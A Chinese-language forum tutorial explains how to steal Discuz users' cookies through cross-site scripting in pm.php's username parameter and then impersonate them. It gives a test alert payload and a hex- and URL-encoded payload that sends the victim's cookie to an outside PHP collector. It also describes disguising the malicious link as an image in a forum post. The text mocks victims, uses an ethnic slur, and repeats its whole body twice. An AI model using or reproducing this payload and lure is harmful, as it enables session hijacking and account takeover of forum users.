跨站脚本攻击+Cookies欺骗(Discuz篇)
作者:
跨站脚本攻击+Cookies欺骗(Discuz篇)
这次我拿Discuz示范给大家看,首先我们都知道,Discuz在pm.php的程式中,并没有对
会员名字做过滤,导致我们可以写入一些script.
聪明的同学们,想到了吗?我们正可以利用这个漏洞写一段获取cookies的script.
这是要像看到颜色 就会反应的!(取自 数学补习班= =")
所以我们先从本端 获取自己cookies看看...
例句:
http://www.abc.com/pm.php?action=send&username=看啥?"><script>alert(documents.cookie)</script><
OK? 接下来 我们为了要获取别人的cookies 所以采用跨站台的方式,
首先把让对方看了我们精心构制好的URL.连了之后会到我们构制好的php or asp 程式里面.
并把对方自己的cookies写入 我们的程式中...(如果需要 请googles搜寻 大陆狗 那边一堆)...
所以啦~获取到对方cookies之后,我们找自己在该论坛的cookies记录..
找到之后 把cookies里面的资讯改成对方的使用者名称,以及加密过的md5码...
切记md5码是不可以反逆的~
现在我把原理说完ㄌ...开始实战吧~~小杂碎 快来阿!
现在已经知道pm.php的bug. 我们也已经把php程式上传准备完成.
接下来 我们到论坛发link! P.S. 有些论坛 还可以利用 头像 来欺骗...
全看个人的思维....(想起数学老师ㄌ= =")
我贴了个问电脑问题的文章连结,并附上图片...(嘿嘿重点在图片拉~)
我假设有一个假网址,http://myweb.hinet.net/uarestupid/home1/XXX.jpg
随便你写 只要看起来像个图片 连结就够了....
并把http://myweb.hinet.net/uarestupid/home1/XXX.jpg加上我们漏洞的连结,
所以看起来就是这样:
http://myweb.hinet.net/uarestupid/home1/XXX.jpg
以上这段图片link看起来大家都毫不考虑的认为真的是图片...
其实连结到,
http://www.abc.com/pm.php?action=send&username=fuck%22%3E%3Cscript%3Ewindow.open("%68%74%74%70%3A%2F%2F%6D%65%6D%62%65%72%73%2E%6C%79%63%6F%73%2E%63%6F%2E%75%6B%2F%6A%65%72%65%6D%79%68%63%77%2F%68%2E%70%68%70?"%2Bdocuments.cookie)%3C/script%3E%3Cb%22
以上我已经url编码过了,用功的同学用cookies搜一下吧...
所以呢 他按了图片连结后....把自己的cookies送出去了 = =" 但是他还是可以看到图片...
会员名字做过滤,导致我们可以写入一些script.
聪明的同学们,想到了吗?我们正可以利用这个漏洞写一段获取cookies的script.
这是要像看到颜色 就会反应的!(取自 数学补习班= =")
所以我们先从本端 获取自己cookies看看...
例句:
http://www.abc.com/pm.php?action=send&username=看啥?"><script>alert(documents.cookie)</script><
OK? 接下来 我们为了要获取别人的cookies 所以采用跨站台的方式,
首先把让对方看了我们精心构制好的URL.连了之后会到我们构制好的php or asp 程式里面.
并把对方自己的cookies写入 我们的程式中...(如果需要 请googles搜寻 大陆狗 那边一堆)...
所以啦~获取到对方cookies之后,我们找自己在该论坛的cookies记录..
找到之后 把cookies里面的资讯改成对方的使用者名称,以及加密过的md5码...
切记md5码是不可以反逆的~
现在我把原理说完ㄌ...开始实战吧~~小杂碎 快来阿!
现在已经知道pm.php的bug. 我们也已经把php程式上传准备完成.
接下来 我们到论坛发link! P.S. 有些论坛 还可以利用 头像 来欺骗...
全看个人的思维....(想起数学老师ㄌ= =")
我贴了个问电脑问题的文章连结,并附上图片...(嘿嘿重点在图片拉~)
我假设有一个假网址,http://myweb.hinet.net/uarestupid/home1/XXX.jpg
随便你写 只要看起来像个图片 连结就够了....
并把http://myweb.hinet.net/uarestupid/home1/XXX.jpg加上我们漏洞的连结,
所以看起来就是这样:
http://myweb.hinet.net/uarestupid/home1/XXX.jpg
以上这段图片link看起来大家都毫不考虑的认为真的是图片...
其实连结到,
http://www.abc.com/pm.php?action=send&username=fuck%22%3E%3Cscript%3Ewindow.open("%68%74%74%70%3A%2F%2F%6D%65%6D%62%65%72%73%2E%6C%79%63%6F%73%2E%63%6F%2E%75%6B%2F%6A%65%72%65%6D%79%68%63%77%2F%68%2E%70%68%70?"%2Bdocuments.cookie)%3C/script%3E%3Cb%22
以上我已经url编码过了,用功的同学用cookies搜一下吧...
所以呢 他按了图片连结后....把自己的cookies送出去了 = =" 但是他还是可以看到图片...